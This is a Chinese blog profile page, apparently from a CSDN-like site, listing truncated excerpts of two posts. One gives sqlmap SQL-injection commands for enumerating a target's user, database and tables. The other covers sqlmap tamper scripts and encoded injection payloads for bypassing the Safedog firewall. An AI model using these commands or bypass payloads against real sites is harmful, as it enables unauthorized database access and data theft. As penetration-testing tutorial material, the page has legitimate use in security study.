- 博客(2)
- 资源 (1)
- 收藏
- 关注
原创 详细SQL注入命令使用方法
sql注入 sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称 sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名 sqlm
2016-01-05 17:02:29 4161
原创 sqlmap脚本绕安全狗
脚本名:apostrophemask.py 作用:用utf8代替引号《Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'》 作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论 Example: ("value' UNION ALL SELECT CONCAT(
2016-01-05 13:13:02 4208 1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人